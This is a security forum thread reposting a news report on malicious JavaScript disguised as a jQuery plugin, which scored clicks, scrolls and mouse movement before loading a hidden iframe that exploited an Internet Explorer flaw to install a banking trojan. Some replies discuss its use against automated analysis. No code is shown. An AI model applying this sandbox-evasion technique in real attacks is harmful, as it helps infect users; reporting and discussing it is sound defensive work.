Security News Sneaky JavaScript Waits for User Interaction Before Infecting Them with Malware

Exterminator

Level 85
Thread author
Verified
Top Poster
Well-known
Oct 23, 2012
12,527
Malware gangs are always looking for new methods or old tricks to refurbish for their attacks. One of the latest methods they employ relies on using a user interaction score to decide if to load their malicious content or not.

The technique was spotted by security firm Forcepoint on a boxing-related website in Russia and resulted in users getting infected with the Buhtrap banking trojan.

The culprit, in this case, is a JavaScript file that attackers added to the compromised website's source code. The file contained a copyright section that tried to fool users who inspected the file, making them believe that this was a copy of the jQuery Animate Plugin v1.2 plugin. In reality, the file contained a different copyright section, separate from the real plugin.

Malicious code assigned different scores for user actions
After taking a closer look at this file, researchers said they found a grading system inside it. Crooks had assigned scores to actions like clicking (16 points), scrolling (11 points), or moving the mouse (1 point).

The plugin would wait for the page to load, and for user interaction. Based on what types of interactions occurred, if the total score surpassed 30, then it would load a hidden iframe on the same page.
This iframe contained exploit code that attempted to run various PowerShell commands that took advantage of the CVE-2016-0189 Internet Explorer vulnerability to install the banking trojan.

Obviously, since this was an Internet Explorer flaw, the malicious jQuery plugin triggered only for IE browsers, ignoring others.

Trick seen before in a small-time, now-defunct exploit kit
CVE-2016-0189 is a security flaw that was used in cyber-espionage attacks against South Korean organizations, and which Microsoft patched in May.

After a researcher foolishly published active exploitation proof-of-concept code on GitHub, the code was added to the Neutrino exploit kit in July.

This trick of loading hidden iframes on a page only after the user has interacted with the content has been seen before in 2014, used by a small-time exploit kit called Niteris, also known as CottonCastle. The grading system is somewhat novel.

 

DardiM

Level 26
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Thanks for the share :)
What is the benefit of this trick? I can't think of any.
Agreed, they are some very bored authors lol
Cool Share Exterminator :)

=> to be almost sure a real person is present on the webpage, before eventually redirecting to the exploit / malware page, for example (method against automated analysis systems, etc...)
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top